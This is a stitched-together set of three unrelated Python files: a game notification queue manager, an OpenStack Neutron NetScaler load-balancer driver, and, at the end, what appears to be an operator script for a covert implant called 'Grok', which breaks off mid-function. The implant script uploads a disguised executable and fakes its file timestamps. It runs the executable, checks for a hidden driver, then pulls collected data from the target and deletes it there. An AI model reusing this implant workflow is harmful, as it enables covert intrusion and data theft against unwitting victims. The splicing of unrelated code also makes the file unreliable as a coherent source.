    def cancel_notification_by_id(self, task_id):
        """Remove the (single) task with *task_id*, if queued."""
        for tasks_by_type in self._tasks.values():
            for task in tasks_by_type:
                if task.task_id == task_id:
                    self.remove_task(task)
                    break

    def cancel_notification_by_key(self, key):
        """Remove every queued task carrying notification key *key*."""
        for tasks_by_type in self._tasks.values():
            tasks_to_remove = [task for task in tasks_by_type if task.key == key]
            for task in tasks_to_remove:
                self.remove_task(task)

    def cancel_all_notifications(self):
        """Drop every queued task and its on-disk file."""
        for task_type, tasks_by_type in self._tasks.items():
            for task in tasks_by_type:
                task.remove()
            self._tasks[task_type] = []
            self._task_ids[task_type].clear()
            self._num_tasks_per_sender[task_type].clear()

    def cancel_all_pending_notifications(self):
        """Drop every task whose send time is still in the future.

        Lists are sorted ascending, so due tasks come first; the old
        'else: break' stopped the scan at the first *due* task and never
        reached the pending ones behind it.
        """
        current_time = get_time()
        tasks_to_delete = []
        for tasks_by_type in self._tasks.values():
            for task in tasks_by_type:
                if current_time < task.time:
                    tasks_to_delete.append(task)
        for task in tasks_to_delete:
            self.remove_task(task)

    def has_task(self, task_id):
        """True when a task with *task_id* is queued in any bucket."""
        for task_ids in self._task_ids.values():
            if task_id in task_ids:
                return True
        return False

    def remove_task(self, task):
        """Unqueue *task*, update the per-sender count, and delete its file."""
        notification_type = task.notification_type
        self._tasks[notification_type].remove(task)
        self._task_ids[notification_type].remove(task.task_id)
        self._num_tasks_per_sender[notification_type][task.sender] -= 1
        task.remove()
class GameNotificationTaskListManager(object):
    """Process-wide cache of GameNotificationTaskList objects.

    Keyed by game slug, then by recipient username.
    """

    gnt_lists = defaultdict(lambda: {})

    @classmethod
    def load(cls, game, recipient):
        """Build the task list for (game, recipient) and cache it."""
        tasks = GameNotificationTaskList(game.slug, recipient)
        cls.gnt_lists[game.slug][recipient] = tasks
        return tasks

    @classmethod
    def get(cls, game, recipient):
        """Return the cached task list, loading it on first access."""
        try:
            return cls.gnt_lists[game.slug][recipient]
        except KeyError:
            return cls.load(game, recipient)

    @classmethod
    def reset(cls):
        # Must remain a defaultdict: load() assigns into
        # cls.gnt_lists[game.slug] without creating the slug entry first, so
        # resetting to a plain dict made every load() after reset() raise
        # KeyError.
        cls.gnt_lists = defaultdict(lambda: {})

    @classmethod
    def add_task(cls, game, task):
        """Queue *task* for its recipient; False when over the sender quota."""
        tasklist = cls.get(game, task.recipient)
        return tasklist.add_task(task)

    @classmethod
    def poll_latest(cls, game, recipient):
        """Pop and return every due notification for (game, recipient)."""
        tasklist = cls.get(game, recipient)
        return tasklist.poll_latest()

    @classmethod
    def cancel_notification_by_id(cls, game, task_id):
        """Cancel the task with *task_id* wherever it is queued for *game*.

        Returns True when a matching task was found and cancelled.
        """
        slug = game.slug
        if slug in cls.gnt_lists:
            for task_list in cls.gnt_lists[slug].values():
                if task_list.has_task(task_id):
                    task_list.cancel_notification_by_id(task_id)
                    return True
        return False

    @classmethod
    def cancel_notification_by_key(cls, game, recipient, key):
        """Cancel every queued task with notification key *key*."""
        cls.get(game, recipient).cancel_notification_by_key(key)

    @classmethod
    def cancel_all_notifications(cls, game, recipient):
        """Cancel every queued task for (game, recipient)."""
        cls.get(game, recipient).cancel_all_notifications()

    @classmethod
    def cancel_all_pending_notifications(cls, game, recipient):
        """Cancel every not-yet-due task for (game, recipient)."""
        cls.get(game, recipient).cancel_all_pending_notifications()
def _get_settings_path():
    """Absolute, normalised path of the shared notificationsettings.yaml."""
    settings_file = _get_task_path('', '', '', 'notificationsettings.yaml')
    return norm_path(settings_file)
def reset_game_notification_settings():
    """Rewrite notificationsettings.yaml with both settings enabled.

    Raises GameNotificationSettingsError when the file cannot be written.
    """
    defaults = {
        'email_setting': 1,
        'site_setting': 1
    }
    try:
        yaml_path = _get_settings_path()
        with open(unicode(yaml_path), 'wb') as f:
            yaml.safe_dump(defaults, f, default_flow_style=False)
    except IOError as e:
        # NOTE(review): message says gamenotifications.yaml but this writes
        # notificationsettings.yaml; text kept as-is to preserve behavior.
        s = 'Failed resetting gamenotifications.yaml file %s' % str(e)
        LOG.error(s)
        raise GameNotificationSettingsError(s)
def get_game_notification_settings():
    """Read notificationsettings.yaml, creating it with defaults if missing.

    Returns {'email_setting': int, 'site_setting': int}.
    Raises GameNotificationSettingsError when the file cannot be read/parsed.
    """
    yaml_path = _get_settings_path()
    if not access(yaml_path, R_OK):
        reset_game_notification_settings()
    try:
        with open(unicode(yaml_path), 'rb') as f:
            # safe_load: a settings file must not be able to instantiate
            # arbitrary Python objects (yaml.load without a Loader can).
            data = yaml.safe_load(f)
            return {
                'email_setting': int(data['email_setting']),
                'site_setting': int(data['site_setting'])
            }
    except (IOError, KeyError, TypeError, ValueError, YAMLError) as e:
        s = 'Failed loading notificationsettings.yaml file: %s' % str(e)
        LOG.error(s)
        raise GameNotificationSettingsError(s)
| |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2013 New Dream Network, LLC (DreamHost)
# Copyright 2013 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Mark McClain, DreamHost
# @author: Youcef Laribi, Citrix
import uuid
from oslo.config import cfg
from neutron.api.v2 import attributes
from neutron.common import constants as q_const
from neutron.common import exceptions as q_exc
from neutron.common import rpc as q_rpc
from neutron.db import agents_db
from neutron.db.loadbalancer import loadbalancer_db
from neutron.extensions import lbaas_agentscheduler
from neutron.openstack.common import importutils
from neutron.openstack.common import log as logging
from neutron.openstack.common import rpc
from neutron.openstack.common.rpc import proxy
from neutron.plugins.common import constants
from neutron.services.loadbalancer.drivers import abstract_driver
LOG = logging.getLogger(__name__)
ACTIVE_PENDING = (
constants.ACTIVE,
constants.PENDING_CREATE,
constants.PENDING_UPDATE
)
AGENT_SCHEDULER_OPTS = [
cfg.StrOpt('loadbalancer_pool_scheduler_driver',
default='neutron.services.loadbalancer.agent_scheduler'
'.ChanceScheduler',
help=_('Driver to use for scheduling '
'pool to a default loadbalancer agent')),
]
cfg.CONF.register_opts(AGENT_SCHEDULER_OPTS)
# topic name for this particular agent implementation
TOPIC_LOADBALANCER_DEVICE = 'q-lbaas-netscaler'
TOPIC_LOADBALANCER_AGENT = 'lbaas_netscaler_agent'
class LoadBalancerCallbacks(object):
    """Agent-to-plugin RPC callbacks for the NetScaler LBaaS driver."""

    RPC_API_VERSION = '1.0'

    def __init__(self, plugin):
        self.plugin = plugin

    def create_rpc_dispatcher(self):
        """Dispatch to these callbacks plus the standard agent-state RPC."""
        callbacks = [self, agents_db.AgentExtRpcCallback(self.plugin)]
        return q_rpc.PluginRpcDispatcher(callbacks)

    def pool_destroyed(self, context, pool_id=None, host=None):
        """Agent confirmation hook that a pool has been destroyed.
        This method exists for subclasses to change the deletion
        behavior.
        """
        pass

    def plug_vip_port(self, context, port_id=None, host=None):
        """Mark the VIP port up and owned by the loadbalancer service."""
        if not port_id:
            return
        core_plugin = self.plugin._core_plugin
        try:
            port = core_plugin.get_port(context, port_id)
        except q_exc.PortNotFound:
            LOG.debug(_('Unable to find port %s to plug.'), port_id)
            return
        port.update({
            'admin_state_up': True,
            'device_owner': 'neutron:' + constants.LOADBALANCER,
            'device_id': str(uuid.uuid5(uuid.NAMESPACE_DNS, str(host))),
        })
        core_plugin.update_port(context, port_id, {'port': port})

    def unplug_vip_port(self, context, port_id=None, host=None):
        """Bring the VIP port down and clear its device ownership."""
        if not port_id:
            return
        not_found_msg = _('Unable to find port %s to unplug. This can occur when '
                          'the Vip has been deleted first.')
        core_plugin = self.plugin._core_plugin
        try:
            port = core_plugin.get_port(context, port_id)
        except q_exc.PortNotFound:
            LOG.debug(not_found_msg, port_id)
            return
        port.update({
            'admin_state_up': False,
            'device_owner': '',
            'device_id': '',
        })
        try:
            core_plugin.update_port(context, port_id, {'port': port})
        except q_exc.PortNotFound:
            # Port vanished between get and update (vip deleted first).
            LOG.debug(not_found_msg, port_id)

    def update_pool_stats(self, context, pool_id=None, stats=None, host=None):
        """Persist stats pushed by the agent for *pool_id*."""
        self.plugin.update_pool_stats(context, pool_id, data=stats)
class LoadBalancerAgentApi(proxy.RpcProxy):
    """Plugin side of plugin to agent RPC API."""

    BASE_RPC_API_VERSION = '1.0'
    # history
    #   1.0 Initial version
    #   1.1 Support agent_updated call

    def __init__(self, topic):
        super(LoadBalancerAgentApi, self).__init__(
            topic, default_version=self.BASE_RPC_API_VERSION)

    def _cast_to_host(self, context, host, method, version=None, **kwargs):
        """Cast *method*(**kwargs) to the agent instance on *host*.

        Every public method below funnels through here so the host-scoped
        topic construction lives in exactly one place. version=None lets
        RpcProxy.cast fall back to the proxy's default version.
        """
        return self.cast(
            context,
            self.make_msg(method, **kwargs),
            topic='%s.%s' % (self.topic, host),
            version=version
        )

    def create_vip(self, context, vip, netinfo, host):
        return self._cast_to_host(context, host, 'create_vip',
                                  vip=vip, netinfo=netinfo)

    def update_vip(self, context, old_vip, vip, old_netinfo, netinfo, host):
        return self._cast_to_host(context, host, 'update_vip',
                                  old_vip=old_vip, vip=vip,
                                  old_netinfo=old_netinfo, netinfo=netinfo)

    def delete_vip(self, context, vip, netinfo, host):
        return self._cast_to_host(context, host, 'delete_vip',
                                  vip=vip, netinfo=netinfo)

    def create_pool(self, context, pool, netinfo, host):
        return self._cast_to_host(context, host, 'create_pool',
                                  pool=pool, netinfo=netinfo)

    def update_pool(self, context, old_pool, pool, old_netinfo, netinfo, host):
        return self._cast_to_host(context, host, 'update_pool',
                                  old_pool=old_pool, pool=pool,
                                  old_netinfo=old_netinfo, netinfo=netinfo)

    def delete_pool(self, context, pool, netinfo, host):
        return self._cast_to_host(context, host, 'delete_pool',
                                  pool=pool, netinfo=netinfo)

    def create_member(self, context, member, netinfo, host):
        return self._cast_to_host(context, host, 'create_member',
                                  member=member, netinfo=netinfo)

    def update_member(self, context, old_member, member, old_netinfo, netinfo, host):
        return self._cast_to_host(context, host, 'update_member',
                                  old_member=old_member, member=member,
                                  old_netinfo=old_netinfo, netinfo=netinfo)

    def delete_member(self, context, member, netinfo, host):
        return self._cast_to_host(context, host, 'delete_member',
                                  member=member, netinfo=netinfo)

    def create_pool_health_monitor(self, context, health_monitor, pool_id, netinfo, host):
        return self._cast_to_host(context, host, 'create_pool_health_monitor',
                                  health_monitor=health_monitor,
                                  pool_id=pool_id, netinfo=netinfo)

    def update_health_monitor(self, context, old_health_monitor,
                              health_monitor, pool_id, netinfo, host):
        return self._cast_to_host(context, host, 'update_health_monitor',
                                  old_health_monitor=old_health_monitor,
                                  health_monitor=health_monitor,
                                  pool_id=pool_id, netinfo=netinfo)

    def delete_pool_health_monitor(self, context, health_monitor, pool_id,
                                   netinfo, host):
        return self._cast_to_host(context, host, 'delete_pool_health_monitor',
                                  health_monitor=health_monitor,
                                  pool_id=pool_id, netinfo=netinfo)

    def agent_updated(self, context, admin_state_up, host):
        # The only call needing the 1.1 API.
        return self._cast_to_host(context, host, 'agent_updated',
                                  version='1.1',
                                  payload={'admin_state_up': admin_state_up})
class NetScalerPluginDriver(abstract_driver.LoadBalancerAbstractDriver):
    """LBaaS plugin driver that forwards all configuration to a NetScaler
    agent over RPC.

    Pools are scheduled onto agents; one SNAT port per (tenant, subnet)
    reserves the source IP the device uses on that subnet.
    """

    def __init__(self, plugin):
        self.agent_rpc = LoadBalancerAgentApi(TOPIC_LOADBALANCER_AGENT)
        self.callbacks = LoadBalancerCallbacks(plugin)
        # Consume agent->plugin callbacks on the device topic.
        self.conn = rpc.create_connection(new=True)
        self.conn.create_consumer(
            TOPIC_LOADBALANCER_DEVICE,
            self.callbacks.create_rpc_dispatcher(),
            fanout=False)
        self.conn.consume_in_thread()
        self.plugin = plugin
        self.plugin.agent_notifiers.update(
            {q_const.AGENT_TYPE_LOADBALANCER: self.agent_rpc})
        self.pool_scheduler = importutils.import_object(
            cfg.CONF.loadbalancer_pool_scheduler_driver)

    def _get_vip_network_info(self, context, vip):
        """Return port/network/subnet details the agent needs for a vip."""
        network_info = {}
        subnet_id = vip['subnet_id']
        subnet = self.plugin._core_plugin.get_subnet(context, subnet_id)
        network_id = subnet['network_id']
        network = self.plugin._core_plugin.get_network(context, network_id)
        network_info['port_id'] = vip['port_id']
        network_info['network_id'] = subnet['network_id']
        network_info['subnet_id'] = subnet_id
        # Provider attributes only exist when the provider-net extension is on.
        if 'provider:network_type' in network:
            network_info['network_type'] = network['provider:network_type']
        if 'provider:segmentation_id' in network:
            network_info['segmentation_id'] = network['provider:segmentation_id']
        return network_info

    def _get_pool_network_info(self, context, pool):
        """Like _get_vip_network_info, keyed off the pool's subnet (no port)."""
        network_info = {}
        subnet_id = pool['subnet_id']
        subnet = self.plugin._core_plugin.get_subnet(context, subnet_id)
        network_id = subnet['network_id']
        network = self.plugin._core_plugin.get_network(context, network_id)
        network_info['network_id'] = network_id
        network_info['subnet_id'] = subnet_id
        if 'provider:network_type' in network:
            network_info['network_type'] = network['provider:network_type']
        if 'provider:segmentation_id' in network:
            network_info['segmentation_id'] = network['provider:segmentation_id']
        return network_info

    def _get_pools_on_subnet(self, context, tenant_id, subnet_id):
        """Return the tenant's pools on *subnet_id*."""
        # NOTE(review): 'filter' shadows the builtin; kept unchanged here.
        filter = {'subnet_id': [subnet_id], 'tenant_id': [tenant_id]}
        pools = self.plugin.get_pools(context, filters=filter)
        return pools

    def _get_snatport_for_subnet(self, context, tenant_id, subnet_id):
        """Find the tenant's SNAT port on *subnet_id*, or None.

        SNAT ports are recognised purely by the '_lb-snatport-<subnet>'
        naming convention.
        """
        name = '_lb-snatport-' + subnet_id
        subnet = self.plugin._core_plugin.get_subnet(context, subnet_id)
        network_id = subnet['network_id']
        LOG.info(_("Filtering ports based on network_id=%s, tenant_id=%s, name=%s" %
                   (network_id, tenant_id, name)))
        filter = {'network_id': [network_id], 'tenant_id': [tenant_id], 'name': [name]}
        ports = self.plugin._core_plugin.get_ports(context, filters=filter)
        if ports:
            LOG.info(_("Found an existing SNAT port for subnet %s" % subnet_id))
            return ports[0]
        LOG.info(_("Found no SNAT ports for subnet %s" % subnet_id))
        return None

    def _create_snatport_for_subnet(self, context, tenant_id, subnet_id, ip_address):
        """Create the SNAT port on *subnet_id*, optionally pinning the IP."""
        subnet = self.plugin._core_plugin.get_subnet(context, subnet_id)
        fixed_ip = {'subnet_id': subnet['id']}
        if ip_address and ip_address != attributes.ATTR_NOT_SPECIFIED:
            fixed_ip['ip_address'] = ip_address
        port_data = {
            'tenant_id': tenant_id,
            'name': '_lb-snatport-' + subnet_id,
            'network_id': subnet['network_id'],
            'mac_address': attributes.ATTR_NOT_SPECIFIED,
            # Port only reserves the address; it is never bound/active.
            'admin_state_up': False,
            'device_id': '',
            'device_owner': '',
            'fixed_ips': [fixed_ip]
        }
        port = self.plugin._core_plugin.create_port(context, {'port': port_data})
        return port

    def _remove_snatport_for_subnet(self, context, tenant_id, subnet_id):
        """Delete the tenant's SNAT port on *subnet_id*, if one exists."""
        port = self._get_snatport_for_subnet(context, tenant_id, subnet_id)
        if port:
            self.plugin._core_plugin.delete_port(context, port['id'])

    def _create_snatport_for_subnet_if_not_exists(self, context, tenant_id, subnet_id, network_info):
        """Ensure a SNAT port exists and record it in *network_info*.

        Mutates network_info in place (adds 'port_id' and 'snat_ip');
        returns None.
        """
        port = self._get_snatport_for_subnet(context, tenant_id, subnet_id)
        if not port:
            LOG.info(_("No SNAT port exists yet for subnet %s. Creating one..." % subnet_id))
            port = self._create_snatport_for_subnet(context, tenant_id, subnet_id, ip_address=None)
        network_info['port_id'] = port['id']
        network_info['snat_ip'] = port['fixed_ips'][0]['ip_address']
        LOG.info(_("SNAT port: %s" % repr(port)))

    def _remove_snatport_for_subnet_if_not_used(self, context, tenant_id, subnet_id):
        """Drop the SNAT port once no pools remain on the subnet."""
        pools = self._get_pools_on_subnet(context, tenant_id, subnet_id)
        if not pools:
            #No pools left on the old subnet. We can remove the SNAT port/ipaddress
            self._remove_snatport_for_subnet(context, tenant_id, subnet_id)
            LOG.info(_("Removing SNAT port for subnet %s as it is the last pool using it..." % subnet_id))

    def get_pool_agent(self, context, pool_id):
        """Return the agent dict hosting *pool_id*; raise if none active."""
        agent = self.plugin.get_lbaas_agent_hosting_pool(context, pool_id)
        if not agent:
            raise lbaas_agentscheduler.NoActiveLbaasAgent(pool_id=pool_id)
        return agent['agent']

    def create_vip(self, context, vip):
        """Cast vip creation to the agent hosting the vip's pool."""
        agent = self.get_pool_agent(context, vip['pool_id'])
        network_info = self._get_vip_network_info(context, vip)
        self.agent_rpc.create_vip(context, vip, network_info, agent['host'])
        LOG.info(_('create_vip rpc sent to loadbalancer agent...'))

    def update_vip(self, context, old_vip, vip):
        """Cast vip update (old and new state) to the hosting agent."""
        agent = self.get_pool_agent(context, vip['pool_id'])
        old_network_info = self._get_vip_network_info(context, old_vip)
        network_info = self._get_vip_network_info(context, vip)
        self.agent_rpc.update_vip(context, old_vip, vip, old_network_info, network_info, agent['host'])
        LOG.info(_('update_vip rpc sent to loadbalancer agent...'))

    def delete_vip(self, context, vip):
        """Cast vip deletion to the agent, then purge the vip from the DB."""
        agent = self.get_pool_agent(context, vip['pool_id'])
        network_info = self._get_vip_network_info(context, vip)
        self.agent_rpc.delete_vip(context, vip, network_info, agent['host'])
        LOG.info(_('delete_vip rpc sent to loadbalancer agent...'))
        self.plugin._delete_db_vip(context, vip['id'])

    def create_pool(self, context, pool):
        """Schedule the pool onto an agent and cast its creation."""
        LOG.info(_("Pool to be created: %s" % repr(pool)))
        #This is where we pick an agent for this pool (and related resources)
        agent = self.pool_scheduler.schedule(self.plugin, context, pool)
        if not agent:
            raise lbaas_agentscheduler.NoEligibleLbaasAgent(pool_id=pool['id'])
        network_info = self._get_pool_network_info(context, pool)
        #allocate a snat port/ipaddress on the subnet if one doesn't exist
        # NOTE(review): the helper mutates network_info and returns None, so
        # 'port' is always None and never used.
        port = self._create_snatport_for_subnet_if_not_exists(context, pool['tenant_id'], pool['subnet_id'], network_info)
        self.agent_rpc.create_pool(context, pool, network_info, agent['host'])
        LOG.info(_('create_pool rpc sent to loadbalancer agent...'))

    def update_pool(self, context, old_pool, pool):
        """Cast pool update; migrate the SNAT port when the subnet changed."""
        agent = self.get_pool_agent(context, pool['id'])
        old_network_info = self._get_pool_network_info(context, old_pool)
        network_info = self._get_pool_network_info(context, pool)
        if pool['subnet_id'] != old_pool['subnet_id']:
            # if this is the first pool using the new subnet, then add a snat port/ipaddress to it.
            self._create_snatport_for_subnet_if_not_exists(context, pool['tenant_id'], pool['subnet_id'], network_info)
            #remove the old snat port/ipaddress from old subnet if this was the last pool using it
            self._remove_snatport_for_subnet_if_not_used(context, old_pool['tenant_id'], old_pool['subnet_id'])
        self.agent_rpc.update_pool(context, old_pool, pool, old_network_info, network_info, agent['host'])
        LOG.info(_('update_pool rpc sent to loadbalancer agent...'))

    def delete_pool(self, context, pool):
        """Cast pool deletion, purge it from DB, and release the SNAT port."""
        LOG.info(_("Pool to be deleted: %s" % repr(pool)))
        agent = self.get_pool_agent(context, pool['id'])
        network_info = self._get_pool_network_info(context, pool)
        self.agent_rpc.delete_pool(context, pool, network_info, agent['host'])
        LOG.info(_('delete_pool rpc sent to loadbalancer agent...'))
        self.plugin._delete_db_pool(context, pool['id'])
        self._remove_snatport_for_subnet_if_not_used(context, pool['tenant_id'], pool['subnet_id'])

    def create_member(self, context, member):
        """Cast member creation to the agent hosting the member's pool."""
        agent = self.get_pool_agent(context, member['pool_id'])
        pool = self.plugin.get_pool(context, member['pool_id'])
        network_info = self._get_pool_network_info(context, pool)
        self.agent_rpc.create_member(context, member, network_info, agent['host'])
        LOG.info(_('create_member rpc sent to loadbalancer agent...'))

    def update_member(self, context, old_member, member):
        """Cast member update with network info for both old and new pools."""
        agent = self.get_pool_agent(context, member['pool_id'])
        old_pool = self.plugin.get_pool(context, old_member['pool_id'])
        pool = self.plugin.get_pool(context, member['pool_id'])
        old_network_info = self._get_pool_network_info(context, old_pool)
        network_info = self._get_pool_network_info(context, pool)
        self.agent_rpc.update_member(context, old_member, member, old_network_info, network_info, agent['host'])
        LOG.info(_('update_member rpc sent to loadbalancer agent...'))

    def delete_member(self, context, member):
        """Cast member deletion, then purge the member from the DB."""
        agent = self.get_pool_agent(context, member['pool_id'])
        pool = self.plugin.get_pool(context, member['pool_id'])
        network_info = self._get_pool_network_info(context, pool)
        self.agent_rpc.delete_member(context, member, network_info, agent['host'])
        LOG.info(_('delete_member rpc sent to loadbalancer agent...'))
        self.plugin._delete_db_member(context, member['id'])

    def create_pool_health_monitor(self, context, health_monitor, pool_id):
        """Cast health-monitor association to the pool's agent."""
        LOG.info(_("about to create health monitor..."))
        agent = self.get_pool_agent(context, pool_id)
        pool = self.plugin.get_pool(context, pool_id)
        network_info = self._get_pool_network_info(context, pool)
        self.agent_rpc.create_pool_health_monitor(context, health_monitor, pool_id, network_info, agent['host'])
        LOG.info(_('create_pool_health_monitor rpc sent to loadbalancer agent...'))

    def update_health_monitor(self, context, old_health_monitor,
                              health_monitor, pool_id):
        """Cast health-monitor update to the pool's agent."""
        agent = self.get_pool_agent(context, pool_id)
        pool = self.plugin.get_pool(context, pool_id)
        network_info = self._get_pool_network_info(context, pool)
        self.agent_rpc.update_health_monitor(context, old_health_monitor,
                                             health_monitor, pool_id, network_info, agent['host'])
        LOG.info(_('update_health_monitor rpc sent to loadbalancer agent...'))

    def delete_pool_health_monitor(self, context, health_monitor, pool_id):
        """Cast disassociation to the agent, then purge the DB binding."""
        agent = self.get_pool_agent(context, pool_id)
        pool = self.plugin.get_pool(context, pool_id)
        network_info = self._get_pool_network_info(context, pool)
        self.agent_rpc.delete_pool_health_monitor(context, health_monitor, pool_id,
                                                  network_info, agent['host'])
        LOG.info(_('delete_health_monitor rpc sent to loadbalancer agent...'))
        self.plugin._delete_db_pool_health_monitor(context, health_monitor['id'], pool_id)

    def stats(self, context, pool_id):
        """Stats are pushed by the agent via update_pool_stats; no-op here."""
        pass
| |
import dsz.lp
import dsz.version
import dsz.ui
import dsz.path
import dsz.file
import dsz.control
import dsz.menu
import dsz.env
tool = 'Grok'
version = '1.2.0.1'
fileName = 'help16.exe'
resDir = dsz.lp.GetResourcesDirectory()
logdir = dsz.lp.GetLogsDirectory()
GROK_PATH = ('%s\\%s\\%s' % (resDir, tool, version))
def grokverify(input):
    """Check the target for GROK artifacts; True only when fully installed.

    Echoes the state of each expected file; warns on leftover dump/overflow
    files.
    """
    storageSuccessFlag = True
    driverSuccessFlag = True
    temp_dir = '%s\\..\\temp' % systemPath
    # Leftover dump/overflow files indicate problems; the config file is expected.
    if dsz.file.Exists('tm154d.da', temp_dir):
        dsz.ui.Echo('tm154d.da dump file exists ... this should not be here', dsz.ERROR)
    if dsz.file.Exists('tm154p.da', temp_dir):
        dsz.ui.Echo('tm154p.da overflow file exists ... log may be full', dsz.ERROR)
    if dsz.file.Exists('tm154_.da', temp_dir):
        dsz.ui.Echo('tm154_.da config file exists ... ', dsz.GOOD)
    if dsz.file.Exists('tm154o.da', temp_dir):
        dsz.ui.Echo('tm154o.da storage file exists ... SUCCESSFUL', dsz.GOOD)
    else:
        dsz.ui.Echo('tm154o.da storage file missing ... FAILED', dsz.ERROR)
        storageSuccessFlag = False
    if dsz.file.Exists('msrtdv.sys', '%s\\drivers' % systemPath):
        dsz.ui.Echo('msrtdv.sys driver exists ... SUCCESSFUL', dsz.GOOD)
    else:
        dsz.ui.Echo('msrtdv.sys driver missing ... FAILED', dsz.ERROR)
        driverSuccessFlag = False
    # Idiomatic boolean logic replaces the '== True'/'== False' chains:
    # both present -> installed; exactly one -> bad state; neither -> absent.
    if driverSuccessFlag and storageSuccessFlag:
        dsz.ui.Echo('GROK properly installed on target', dsz.GOOD)
        return True
    if driverSuccessFlag != storageSuccessFlag:
        dsz.ui.Echo('GROK is in a bad state', dsz.WARNING)
    else:
        dsz.ui.Echo("GROK doesn't exist on target!", dsz.ERROR)
    return False
def putfile(localfile, remotefile):
    """Upload *localfile* to target as *remotefile* and match its filetimes.

    Stores the put command id in the module-global 'putid'. Returns False
    on any failure (the caller must clean up manually).
    """
    global putid
    dsz.ui.Echo('Putting %s on target as %s' % (localfile, remotefile))
    dsz.control.echo.Off()
    (runsuccess, putid) = dsz.cmd.RunEx('put %s -name %s' % (localfile, remotefile))
    dsz.control.echo.On()
    if not runsuccess:
        dsz.ui.Echo('Could not put %s on target as %s' % (localfile, remotefile), dsz.ERROR)
        return False
    dsz.ui.Echo('Successfully put %s on target as %s' % (localfile, remotefile))
    # Blend in by copying the timestamps of a benign system binary.
    dsz.control.echo.Off()
    matched = dsz.cmd.Run('matchfiletimes -src %s\\help.exe -dst %s' % (systemPath, remotefile))
    dsz.control.echo.On()
    if not matched:
        dsz.ui.Echo('Could not matchfiletimes -src %s\\help.exe to -dst %s' % (systemPath, remotefile), dsz.ERROR)
        dsz.ui.Echo('Make sure to manually delete it!!!', dsz.ERROR)
        return False
    dsz.ui.Echo('Matchfiletimes -src %s\\help.exe to -dst %s' % (systemPath, remotefile))
    return True
def runfile(remotefile):
    """Execute *remotefile* on target; echo and return False on failure."""
    dsz.ui.Echo('Running %s' % remotefile)
    dsz.control.echo.Off()
    launched = dsz.cmd.Run('run -command "%s"' % remotefile)
    dsz.control.echo.On()
    if launched:
        return True
    dsz.ui.Echo('Running %s failed!!!' % remotefile, dsz.ERROR)
    dsz.ui.Echo('Make sure to manually clean!!!', dsz.ERROR)
    return False
def collectfiles(temppath):
    """Download the GROK collection file, delete it on target, and decode it.

    The retrieved file is moved into the NOSEND log folder before parsing.
    """
    dsz.ui.Echo('Getting collection file, %s\\Tprf3~' % temppath)
    dsz.control.echo.Off()
    fetched = dsz.cmd.Run('get %s\\Tprf3~' % temppath, dsz.RUN_FLAG_RECORD)
    dsz.control.echo.On()
    if not fetched:
        dsz.ui.Echo('Could not get collection file, %s\\Tprf3~' % temppath, dsz.ERROR)
        return False
    getfilename = dsz.cmd.data.Get('FileLocalName::localname', dsz.TYPE_STRING)[0]
    dsz.ui.Echo('Deleting collection file, %s\\Tprf3~' % temppath)
    dsz.control.echo.Off()
    deleted = dsz.cmd.Run('delete %s\\Tprf3~' % temppath)
    dsz.control.echo.On()
    if not deleted:
        dsz.ui.Echo('Could not delete collection file, %s\\Tprf3~' % temppath, dsz.ERROR)
        return False
    dsz.ui.Echo('Moving file to NOSEND directory...')
    dsz.control.echo.Off()
    dsz.cmd.Run('local mkdir %s\\GetFiles\\NOSEND' % logdir)
    dsz.cmd.Run('local mkdir %s\\GetFiles\\Grok_Decrypted' % logdir)
    dsz.cmd.Run('local move %s\\GetFiles\\%s %s\\GetFiles\\NOSEND\\%s'
                % (logdir, getfilename, logdir, getfilename))
    dsz.control.echo.On()
    # parsefile returns True/False, so its result is our result.
    return parsefile('%s\\GetFiles\\NOSEND\\%s' % (logdir, getfilename))
def parsefile(file):
    """Run GkDecoder.exe on *file*, writing decoded XML to the log folder."""
    (path, filename) = dsz.path.Split(file)
    decode_cmd = ('local run -command "%s\\Offline\\GkDecoder.exe %s %s\\GetFiles\\Grok_Decrypted\\%s.xml"'
                  % (GROK_PATH, file, logdir, filename))
    dsz.control.echo.Off()
    decoded = dsz.cmd.Run(decode_cmd, dsz.RUN_FLAG_RECORD)
    dsz.control.echo.On()
    if not decoded:
        dsz.ui.Echo('There was an error parsing the collection', dsz.ERROR)
        return False
    return True
def grokparse(input):
    """Prompt the operator for a file path and decode it with GkDecoder."""
    fullpath = dsz.ui.GetString('Please enter the full path to the file you want parse: ', '')
    if fullpath == '':
        dsz.ui.Echo('No string entered', dsz.ERROR)
        return False
    # parsefile returns True/False, so its result is our result.
    return parsefile(fullpath)
def sleepwait():
    """Poll every 5 seconds until the uploaded exe deletes itself.

    NOTE(review): there is no retry cap -- if the exe never self-deletes
    this loops (and echoes the error) forever; the operator must break out.
    """
    while True:
        dsz.ui.Echo('Sleeping 5s to see if exe self deletes')
        dsz.Sleep(5000)
        if (not dsz.file.Exists(fileName, systemPath)):
            dsz.ui.Echo('Executeable self deleted, good to go')
            return True
        else:
            dsz.ui.Echo('Executeable did not self delete', dsz.ERROR)
def cdtotemp():
    """cd into the temp dir beside system32; return (temppath, previous cwd)."""
    dsz.control.echo.Off()
    dsz.cmd.Run('pwd', dsz.RUN_FLAG_RECORD)
    curpath = dsz.cmd.data.Get('CurrentDirectory::path', dsz.TYPE_STRING)[0]
    temppath = '%s\\..\\temp' % systemPath
    dsz.cmd.Run('cd %s' % temppath)
    dsz.control.echo.On()
    return (temppath, curpath)
def cdreturn(curpath):
    """Restore the working directory saved by cdtotemp; always True."""
    dsz.control.echo.Off()
    dsz.cmd.Run('cd %s' % curpath)
    dsz.control.echo.On()
    return True
def grokinstall(input):
    """Upload the GROK installer to the system dir, run it, await cleanup."""
    target = '%s\\%s' % (systemPath, fileName)
    if not putfile('%s\\Uploads\\msgki.ex_' % GROK_PATH, target):
        return False
    if not runfile(target):
        return False
    sleepwait()
    return True
def grokcollect(input):
    # Menu handler: upload the collector, run it from the temp directory,
    # wait for self-delete, then pull and parse the produced files.
    remote = '%s\\%s' % (systemPath, fileName)
    if not putfile('%s\\Uploads\\msgkd.ex_' % GROK_PATH, remote):
        return False
    (temppath, curpath) = cdtotemp()
    if not runfile(remote):
        # NOTE(review): returns without cdreturn(), leaving the remote cwd
        # changed — matches the original behaviour.
        return False
    sleepwait()
